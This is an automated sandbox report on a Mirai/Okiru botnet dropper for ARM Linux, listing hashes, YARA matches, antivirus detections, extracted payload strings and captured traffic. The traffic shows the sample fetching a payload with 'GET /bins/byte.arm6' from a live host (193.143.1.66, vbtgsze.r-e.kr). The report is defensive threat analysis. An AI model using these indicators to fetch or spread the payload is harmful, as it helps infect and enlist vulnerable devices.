Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm6.elf

Overview

General Information

Sample name:dlr.arm6.elf
Analysis ID:1582462
MD5:f36b2fdb85fd0ac58c92bd70b5dd65d2
SHA1:698b1722837ba0fed2a50ca4bbb223cd138eb90d
SHA256:7b95bc95d544c96ca8eb67fc12bd56c73be5a3b7019113a796b6e55ef07c70dc
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1582462
Start date and time:2024-12-30 17:28:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 30s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm6.elf
Detection:MAL
Classification:mal88.troj.linELF@0/1@1/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.arm6.elf
Command:/tmp/dlr.arm6.elf
PID:5488
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • dlr.arm6.elf (PID: 5488, Parent: 5414, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm6.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
/tmp/byteJoeSecurity_OkiruYara detected OkiruJoe Security
    /tmp/byteJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      /tmp/byteJoeSecurity_Mirai_5Yara detected MiraiJoe Security
        /tmp/byteMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
        • 0x134f8:$x1: POST /cdn-cgi/
        • 0x14b2c:$s1: LCOGQGPTGP
        /tmp/byteMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
        • 0x134f8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: /tmp/byteAvira: detection malicious, Label: LINUX/Mirai.bonb
        Source: dlr.arm6.elfReversingLabs: Detection: 36%
        Source: byte.12.drString: ;httpurl=POST'=byte/proc//proc/%s/exe/proc/self/exe/proc/proc/%d/cmdlinenetstatwgettftpftpcurlbusyboxreboot/bin/busyboxvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinTacoBellGodYololigangExecutionorbitclientAmnesiaOwariU
        Source: global trafficHTTP traffic detected: GET /bins/byte.arm6 HTTP/1.0Data Raw: 00 00 Data Ascii:
        Source: /tmp/dlr.arm6.elf (PID: 5488)Reads hosts file: /etc/hostsJump to behavior
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /bins/byte.arm6 HTTP/1.0Data Raw: 00 00 Data Ascii:
        Source: global trafficDNS traffic detected: DNS query: vbtgsze.r-e.kr

        System Summary

        barindex
        Source: /tmp/byte, type: DROPPEDMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
        Source: /tmp/byte, type: DROPPEDMatched rule: Detects ELF malware Mirai related Author: Florian Roth
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/byte, type: DROPPEDMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
        Source: /tmp/byte, type: DROPPEDMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: classification engineClassification label: mal88.troj.linELF@0/1@1/0
        Source: /tmp/dlr.arm6.elf (PID: 5488)File written: /tmp/byteJump to dropped file
        Source: /tmp/dlr.arm6.elf (PID: 5488)Queries kernel information via 'uname': Jump to behavior
        Source: dlr.arm6.elf, 5488.1.00007ffe7fb8d000.00007ffe7fbae000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm6.elf
        Source: dlr.arm6.elf, 5488.1.0000561bf493b000.0000561bf4a8a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: dlr.arm6.elf, 5488.1.0000561bf493b000.0000561bf4a8a000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
        Source: dlr.arm6.elf, 5488.1.00007ffe7fb8d000.00007ffe7fbae000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: /tmp/byte, type: DROPPED
        Source: Yara matchFile source: /tmp/byte, type: DROPPED

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: /tmp/byte, type: DROPPED
        Source: Yara matchFile source: /tmp/byte, type: DROPPED
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Scripting
        Path InterceptionDirect Volume AccessOS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System2
        Non-Application Layer Protocol
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media2
        Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        SourceDetectionScannerLabelLink
        dlr.arm6.elf37%ReversingLabsLinux.Backdoor.Mirai
        SourceDetectionScannerLabelLink
        /tmp/byte100%AviraLINUX/Mirai.bonb
        /tmp/byte78%ReversingLabsLinux.Backdoor.Bushido
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        vbtgsze.r-e.kr
        193.143.1.66
        truefalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          193.143.1.66
          vbtgsze.r-e.krunknown
          57271BITWEB-ASRUfalse
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          vbtgsze.r-e.krbyte.x86.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.213.190.254
          byte.ppc.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.213.190.254
          byte.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.213.190.246
          byte.mips.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.213.190.246
          drp.x86.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.213.190.246
          byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.213.190.246
          byte.arm.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.216.19.138
          byte.spc.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.216.19.138
          byte.m68k.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.216.19.138
          byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
          • 154.216.19.138
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          BITWEB-ASRULauncher_x64.exeGet hashmaliciousLummaCBrowse
          • 193.143.1.9
          WonderHack.exeGet hashmaliciousLummaCBrowse
          • 193.143.1.9
          Wave-Executor.exeGet hashmaliciousLummaCBrowse
          • 193.143.1.9
          https://mdgouv.comGet hashmaliciousHTMLPhisherBrowse
          • 193.143.1.14
          11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
          • 193.143.1.231
          11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
          • 193.143.1.231
          22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
          • 193.143.1.231
          22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
          • 193.143.1.231
          https://courtscali.com/Get hashmaliciousUnknownBrowse
          • 193.143.1.14
          18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
          • 193.143.1.231
          No context
          No context
          Process:/tmp/dlr.arm6.elf
          File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
          Category:dropped
          Size (bytes):94544
          Entropy (8bit):6.238533589587562
          Encrypted:false
          SSDEEP:1536:lHn8+RM4cr8vFgMqZANJKftzdulowN10f9VVaSIQsQWMIiLO42z6T5zYBl61d6K9:u8M43sZnf9duZmf9VVaSLOhz6T92419
          MD5:8F15EF708F3B4B0C670F05D4C2A84C47
          SHA1:4F7B521D38BD3AB5F9EEB1658AA65FC003CABF67
          SHA-256:17E9FA02A2EFCFE6326769A80CB2458BACC5F28F8CB0A68E305AF3F5C4904C45
          SHA-512:17D8C6ECE8828680D967857AA9B044B8831548D77DA509434A3F200677549419B5405A82A4554FA16E900234C2524B876D148C10EEB45345598A96466FEDDDF1
          Malicious:true
          Yara Hits:
          • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
          • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
          • Rule: JoeSecurity_Mirai_5, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
          • Rule: Mirai_Botnet_Malware, Description: Detects Mirai Botnet Malware, Source: /tmp/byte, Author: Florian Roth
          • Rule: MAL_ELF_LNX_Mirai_Oct10_2, Description: Detects ELF malware Mirai related, Source: /tmp/byte, Author: Florian Roth
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 78%
          Reputation:low
          Preview:.ELF..............(.....T...4...po......4. ...(......................b...b...............b...b...b.................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../..n.......b....-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../......b...o...b.................. ... -...-.......-......0...>...9..............O-..@...P...M...M.. ...0...........................p... .......0........W..@..........M'....P.....Q......O..../.}.T.....}..........O7....Y..;.. 0..@p...0C.....)pG..0..Q....`.......0... ...0... ..........$)..2..1C..P... .......... ..1'...0....S......@..7!......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..'!..t;.....!...2...0b...c...P.......(..............x...L... .............p...D..........8...V...^#......V...*#...........&..V....#........X.o......+.. ... B.@p... ..)pG......)...0.....<.......0.....0... .......S.. ...........,..|0C..+...0....... ...S.........
          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
          Entropy (8bit):6.00003830342405
          TrID:
          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
          File name:dlr.arm6.elf
          File size:50'092 bytes
          MD5:f36b2fdb85fd0ac58c92bd70b5dd65d2
          SHA1:698b1722837ba0fed2a50ca4bbb223cd138eb90d
          SHA256:7b95bc95d544c96ca8eb67fc12bd56c73be5a3b7019113a796b6e55ef07c70dc
          SHA512:0ea670209fbe1ca3cab5350960c2c0582f646814c0efde0a0111571985cee307be9370905d137d3ac62303f2fdeb5e9300e4e4e3dbdd6097c9306217bb32231c
          SSDEEP:768:JczdSk4rkssH9dpZAzJiPWvHmWrkimnSawha7bl0iKpWJt5UYSI:Jkdf4rknzWelimn0a7R0iaa5UYS
          TLSH:B6231896F9819B11D5C1117AFE4E124E7323077CE3DE73265E24AB34678797B0E3A80A
          File Content Preview:.ELF..............(.........4...l.......4. ...(..................................................... ...,(..........Q.td..........................................-.......M.................../...-.......M.................../...-......0........M.. .........

          ELF header

          Class:ELF32
          Data:2's complement, little endian
          Version:1 (current)
          Machine:ARM
          Version Number:0x1
          Type:EXEC (Executable file)
          OS/ABI:UNIX - System V
          ABI Version:0
          Entry Point Address:0x83c8
          Flags:0x4000002
          ELF Header Size:52
          Program Header Offset:52
          Program Header Size:32
          Number of Program Headers:3
          Section Header Offset:49772
          Section Header Size:40
          Number of Section Headers:8
          Header String Table Index:7
          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
          NULL0x00x00x00x00x0000
          .textPROGBITS0x80a00xa00xa8740x00x6AX0016
          .rodataPROGBITS0x129180xa9180x13f80x00x2A008
          .gotPROGBITS0x1c0000xc0000x780x40x3WA004
          .dataPROGBITS0x1c0780xc0780x1a80x00x3WA004
          .bssNOBITS0x1c2200xc2200x260c0x00x3WA004
          .ARM.attributesARM_ATTRIBUTES0x00xc2200x100x00x0001
          .shstrtabSTRTAB0x00xc2300x390x00x0001
          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
          LOAD0x00x80000x80000xbd100xbd106.09290x5R E0x8000.text .rodata
          LOAD0xc0000x1c0000x1c0000x2200x282c2.09270x6RW 0x8000.got .data .bss
          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
          TimestampSource PortDest PortSource IPDest IP
          Dec 30, 2024 17:28:58.419248104 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:58.424120903 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:58.424170971 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:58.424959898 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:58.429718971 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107444048 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107460022 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107469082 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107480049 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107490063 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107503891 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107512951 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107523918 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107532024 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107541084 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.107628107 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107628107 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107628107 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107628107 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107628107 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107628107 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107669115 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107669115 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107669115 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.107669115 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.112548113 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.112565041 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.112617970 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.112617970 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.112687111 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.112725973 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.224829912 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.224843025 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.224868059 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.224868059 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.225191116 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.225202084 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.225228071 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.229532957 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.229545116 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.229665041 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.229938984 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.229948997 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.230868101 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.234298944 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.234311104 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.234319925 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.234427929 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.234704971 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.234715939 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.235626936 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.239006996 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.239017963 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.239259005 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.239422083 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.239434004 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.240489006 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.243752003 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.243763924 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.244123936 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.244133949 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.244134903 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.244144917 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.245347977 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.248471975 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.248483896 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.249097109 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.311944008 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.311954975 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.312031031 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.342649937 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.342669010 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.342678070 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.342834949 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.342927933 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.342938900 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.342951059 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.342964888 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.343636036 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.343664885 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.343673944 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.343733072 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.343744040 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.343754053 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.344006062 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.344609022 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.344656944 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.344679117 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.344690084 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.345206976 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.345216990 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.345228910 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.345237970 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.345248938 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.345257998 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.345364094 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.348864079 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.348874092 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.348887920 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.349983931 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.350140095 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.350156069 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.351425886 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.395009995 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.399770021 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399884939 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399895906 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399905920 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399915934 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399924994 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399935007 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399945974 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.399955988 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.400374889 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.400394917 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.400405884 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.400414944 CET8042018193.143.1.66192.168.2.14
